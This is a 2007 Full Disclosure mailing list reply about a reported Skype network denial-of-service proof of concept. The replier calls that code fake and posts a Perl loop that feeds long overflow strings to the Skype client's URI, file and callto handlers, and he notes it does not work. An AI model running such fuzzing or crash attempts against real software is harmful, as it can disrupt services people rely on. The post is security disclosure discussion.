Full Disclosure mailing list archives
Re: Skype Network Remote DoS Exploit
From: ascii <ascii () katamail com>
Date: Fri, 17 Aug 2007 13:48:39 +0200
Valery Marchuk wrote:
Hi all! On SecurityLab.ru forum an exploit code was published by an anonymous user. Reportedly it must have caused Skype massive disconnections today. The PoC uses standard Skype client to call to a specific number. This call causes denial of service of current Skype server and forces Skype to reconnect to another server. The new server also "freezes" and so on ... the entire network. Liks: http://www.securitylab.ru/news/301422.php PoC: http://en.securitylab.ru/poc/301420.php
imho fake (the poc does nothing except looping forever, missing execve(), exec() in place of system(), etc) should be something like #!/usr/bin/perl for ($i=0;$i<(256*256);$i=$i+256) { // ctrl + q for fast quit from skype print "Try with $i\n"; $eot='AAAA' x $i; $str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/uri:$eot\""; #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/file:$eot\""; #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/callto:$eot\""; #$str="\"/home/l/bin/skype_static-latest/skype\" \"/uri:$eot\""; #$str="\"/usr/bin/skype\" \"/uri:$eot\""; #$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; #print($str); system($str); } uri is a legit skype protocol handler 0x2,"Classes\skype\shell\open\command", "", "%SystemDrive%\Program Files\Skype\Phone\Skype.exe" "/uri:%1" 0x1,"Classes\Skype.Content\Shell\Open\Command", "", "%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/file:%1" 0x2,"Classes\callto\shell\open\command", "", "%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/callto:%1" but still doesn't work Regards, Francesco `ascii` Ongaro http://www.ush.it/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Skype Network Remote DoS Exploit Valery Marchuk (Aug 17)
- Re: Skype Network Remote DoS Exploit ascii (Aug 17)
- <Possible follow-ups>
- Skype Network Remote DoS Exploit Valery Marchuk (Aug 17)
- Re: Skype Network Remote DoS Exploit Draichis (Aug 18)